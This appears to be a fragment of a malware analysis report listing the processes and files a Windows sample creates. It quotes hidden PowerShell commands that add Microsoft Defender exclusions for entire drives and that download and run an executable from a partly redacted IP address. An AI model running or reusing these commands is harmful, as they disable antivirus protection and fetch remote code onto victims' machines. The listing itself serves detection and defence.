Technical Information
- '%TEMP%\x.exe'
- %TEMP%\x.exe
- %TEMP%\ysloges.bat
- nul
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\ysloges.bat" "
- '<SYSTEM32>\openfiles.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -ExclusionPath $env:temp,C:\,D:\,E:\,H:\,<Drive name for removable media>:\,G:\ -Force
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -WindowStyle Hidden Invoke-WebRequest -uri "http://5.###.42.104/game.exe" -OutFile "$env:temp\game.exe";iex $env:temp\game.exe